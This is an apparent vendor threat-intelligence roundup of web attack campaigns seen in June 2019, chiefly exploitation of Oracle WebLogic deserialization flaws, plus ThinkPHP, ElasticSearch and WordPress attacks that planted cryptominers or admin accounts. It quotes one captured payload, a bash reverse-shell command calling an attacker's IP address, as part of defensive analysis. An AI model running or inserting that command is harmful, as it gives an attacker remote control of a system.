Security researchers at F5 Networks constantly monitor web traffic at various locations all over the world. This allows us to detect “in the wild” malware, and to get an insight into the current threat landscape. Here’s an overview of what we saw in June 2019.
During the month of June, the team detected 12 new attack campaigns:
- Seven campaigns targeted two separate Oracle WebLogic server vulnerabilities: CVE-2017-10271 and CVE-2019-2725. Both exploits make WebLogic servers vulnerable to unsafe deserialization, leading to remote code execution (RCE).
- In addition to attacks exploiting Oracle WebLogic vulnerabilities, the following notable campaigns were detected this month:
- Convert Plus Plugin Unauthenticated Administrator Creation: The threat actor tried to create an administrator account on a vulnerable WordPress installation.
- ThinkPHP Remote Code Execution (CVE-2018-10225): Threat actors used 7 unique methods to instruct a server to download and execute a cryptominer. This malware was written in Golang. To learn more about this, check out the analysis on F5 Labs.
- ElasticSearch Search Groovy Sandbox Bypass (CVE-2014-3120) The threat actor instructs the server to download and execute a cryptocurrency miner.
- The final two campaigns, which are not discussed in detail here, are a SeaCMS search Remote Code Execution campaign -die MD5, and phpMyAdmin (PMA) configuration code injection.
Oracle WebLogic Server Deserialization Remote Code Execution (CVE-2017-10271): 8zxx
Oracle WebLogic servers are widely used by corporations and are vulnerable to various deserialization vulnerabilities. We've reported on this before and have continued to detect campaigns targeting the same Oracle WebLogic Server (WLS) Security Component vulnerability that leads to RCE. For more information on the technical details behind the vulnerability, check out our April monthly wrap-up, Vulnerabilities, Exploits, and Malware Driving Attack Campaigns in April 2019 and for more details on some of the payloads used check the May monthly wrap-up.
One new technique for executing this exploit was seen in June 2019. A threat actor tries to exploit CVE-2017-10271 by instructing a server to download a malicious file from termbin (a command line pastebin service). While very similar to Pastebin, this is the first campaign we have seen which downloads a payload from termbin. We’ve named this campaign 8zxx after the name of the file downloaded from termbin. The content of the downloaded file is: bash >& /dev/tcp/184.108.40.206/80 0>&1. This command creates a reverse shell to the IP address controlled by the threat actor.
An Oracle WebLogic server vulnerable to CVE-2017-10271 downloads the malicious file from the termbin address and executes it, creating the reverse shell as described above. Based on the team’s analysis, we have concluded that the IP address controlled by the threat actor is located in Sao Paulo, Brazil. Though port 80 (HTTP) was not open at the time of scanning, there are other open ports, including 22 (SSH) and 5060 (SIP communication).